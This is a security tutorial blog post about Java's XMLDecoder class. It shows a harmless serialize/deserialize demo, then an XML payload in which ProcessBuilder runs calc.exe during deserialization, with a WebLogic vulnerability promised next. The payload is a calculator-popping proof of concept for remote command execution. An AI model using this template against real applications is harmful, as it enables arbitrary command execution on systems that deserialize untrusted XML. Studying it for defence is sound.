0x01 Preface
Before, we have come into contact with a relatively basic and common type of deserialization in Java, but the form of deserialization in Java is not so single. Today I want to introduce the serialization and deserialization of the XMLDecoder class.
0x02 XMLDecoder introduction
This class comes with jdk, the location is java.beans.XMLDecoder, the serialization of this class is to convert java objects into xml files, and deserialization is to convert xml files in a specific format into java objects.
We still use a small demo to get familiar with its usage.
Create a class, there are two methods in the class, one is the serialization operation, the other is the deserialization operation
import java.beans.XMLDecoder;
import java.beans.XMLEncoder;
import java.io.*;
public class XMLTest{
// 序列化对象到文件person.xml
public void xmlEncode() throws FileNotFoundException {
Person person = new Person();
person.setAge(18);
person.setName("axin");
XMLEncoder xmlEncoder = new XMLEncoder(new BufferedOutputStream(new FileOutputStream("person.xml")));
xmlEncoder.writeObject(person);
xmlEncoder.close();
System.out.println("序列化结束!");
}
// 反序列化
public void xmlDecode() throws FileNotFoundException {
XMLDecoder xmlDecoder = new XMLDecoder(new BufferedInputStream(new FileInputStream("person.xml")));
Person person = (Person)xmlDecoder.readObject();
xmlDecoder.close();
person.sayHello();
System.out.println("反序列化成功!");
}
public static void main(String[] args) throws FileNotFoundException {
XMLTest xmlTest = new XMLTest();
xmlTest.xmlEncode();
xmlTest.xmlDecode();
}
}
The Person class is as follows:
public class Person {
String name = "";
int age;
public String getName() {
return name;
}
public void setName(String name) {
this.name = name;
}
public int getAge() {
return age;
}
public void setAge(int age) {
this.age = age;
}
public void sayHello(){
System.out.println("Hello, my name is "+name);
}
}
Run the XMLTest class, a person.xml file will be generated in the current project directory, and the terminal will print the result of calling the sayHello method
The xml file format generated by serialization is as follows:
<?xml version="1.0" encoding="UTF-8"?>
<java version="1.8.0_231" class="java.beans.XMLDecoder">
<object class="Person">
<void property="age">
<int>18</int>
</void>
<void property="name">
<string>axin</string>
</void>
</object>
</java>
Deserialize the above xml file, and then execute the sayHello method
0x03 How to use
We already know the common serialization and deserialization methods of XMLDecoder, so how to use it?
We can use its deserialization mechanism to execute arbitrary commands of any object, for example, construct the following xml file:
<java>
<object class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="1">
<void index="0">
<string>calc.exe</string>
</void>
</array>
<void method="start">
</void>
</object>
</java>
If the above xml file is deserialized, it will execute the start method of ProcessBuilder and play a calculator
other
This chapter is just a simple principle of XMLDecoder deserialization. Similarly, I will still find a case to help you understand the vulnerability more clearly. Of course, if you change the soup without changing the medicine, the scenario of the vulnerability has changed, but the essence is not Changed~
In the next chapter, let’s take a look at the XMLDecoder deserialization vulnerability in weblogic.
